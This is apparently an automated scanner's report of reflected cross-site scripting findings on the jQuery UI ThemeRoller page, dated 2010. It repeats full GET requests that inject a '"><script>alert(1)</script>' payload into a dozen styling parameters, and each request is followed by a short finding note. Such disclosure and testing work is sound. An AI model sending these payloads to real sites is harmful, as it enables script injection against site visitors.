GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png7403f"><script>alert(1)</script>521994f8e38&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001
The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 759fc"><script>alert(1)</script>8a9102a62ac was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa759fc"><script>alert(1)</script>8a9102a62ac&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 989c9"><script>alert(1)</script>521a1604b00 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa989c9"><script>alert(1)</script>521a1604b00&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa52a"><script>alert(1)</script>8067e0305a5 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3aa52a"><script>alert(1)</script>8067e0305a5&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45300"><script>alert(1)</script>52b8cc61183 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a45300"><script>alert(1)</script>52b8cc61183&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0a47"><script>alert(1)</script>60d08e980b0 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaad0a47"><script>alert(1)</script>60d08e980b0&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f63f"><script>alert(1)</script>163cc6d3cf8 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa19f63f"><script>alert(1)</script>163cc6d3cf8&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72395"><script>alert(1)</script>c2b2e0d945c was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=99999972395"><script>alert(1)</script>c2b2e0d945c&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b6c8"><script>alert(1)</script>794ffc806f6 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px6b6c8"><script>alert(1)</script>794ffc806f6&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:33 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74466"><script>alert(1)</script>e3901bf7849 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px74466"><script>alert(1)</script>e3901bf7849 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce12a"><script>alert(1)</script>57ff54b00b6 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121ce12a"><script>alert(1)</script>57ff54b00b6&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebeba"><script>alert(1)</script>9e316bab61c was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222ebeba"><script>alert(1)</script>9e316bab61c&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f85e"><script>alert(1)</script>5ce0760a9c0 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=5555559f85e"><script>alert(1)</script>5ce0760a9c0&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:19 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d65d0"><script>alert(1)</script>042902ea54a was submitted in the fcError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
